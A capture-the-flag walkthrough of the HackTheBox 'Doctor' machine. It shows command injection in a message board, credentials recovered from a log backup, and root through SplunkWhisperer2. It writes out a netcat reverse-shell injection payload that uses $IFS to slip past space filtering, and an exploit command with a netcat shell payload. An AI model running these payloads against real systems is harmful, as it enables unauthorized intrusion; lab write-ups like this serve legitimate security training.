HackTheBox “Doctor” Walkthrough
Doctor, an easy-level Linux OS machine on HackTheBox, a platform resembling a digital message board. The challenge involves seeking out a vulnerability tied to “command injection” in order to attain a coveted shell. With this shell, we enumerated the machine more to navigate through logs, ultimately unveiling a password that holds the key to both a user account “shaun” and access to the intriguing Splunk Atom Feed. Subsequently, we’ll utilize “SplunkWhisperer2,” leveraging this exploit to secure a root shell.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Check port 80.
Check port 8089.
Spotlighting an email address, info@doctors.htb. I included doctors.htb in the hosts file.
With no login credentials on hand, I clicked on the “Sign Up Now” button to set up an account. Here’s the scoop on what I used:
- Username: testuser
- Email: test@test.com
- Password: test
- Confirm Password: test
Now, we log into the system using the credentials we set:
Email: test@test.com
Password: test
We’re currently exploring the messaging board, and I decided to kick things off by composing some messages. After experimenting with basic XSS
and SQLi
payloads, I made a breakthrough. It turns out, I found a method that allowed me to establish a connection between the target machine and my attack box after setting up a netcat listener
on my attack box, then inserted a <test>
tag, using my attack box’s IP in the src attribute, and clicked Post
to send the content over to the web server.
On our listener.
After diving deeper into this page, I stumbled upon a method that allows us to run code.
On our listener.
Inside this scenario, we got a response back on our “id” command which is “web”. That tells us that we can Remote Code Execution.
We will now try to get a shell useing the command below:<test src=$(nc.traditional$IFS-e$IFS/bin/bash$IFS''$IFS'4343')>
I gave nc.traditional a shot — it’s like an alternative to nc, but it turned out nc wasn’t doing the trick. To tackle the issue, I employed $IFS, a trick commonly used for injections. This move helped me replace a space that was causing problems. And you know what? I also mixed in some quotes for good measure, just to cover all the bases.
And we get a shell on our listener.
During an enumeration process, an intriguing “backup” file emerges from the depths.
Grep it for credentials.
Let’s switch to the user “shaun” using the password “Guitar123”.
As we enumerate more, linpeas.sh suspected that splunk can be used for privilege escalation.
Curious about boosting my access level, I turned to Google and found a perfect article right on this page. It was simple to elevate my privileges through “Splunk Universal Forwarder Hijacking.”
First, we start a listener.
Download the exploit.
Runing the exploit using the exploit parameters below: python PySplunkWhisperer2_remote.py --host --lhost --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh 4343'
And we get a root shell on our listener.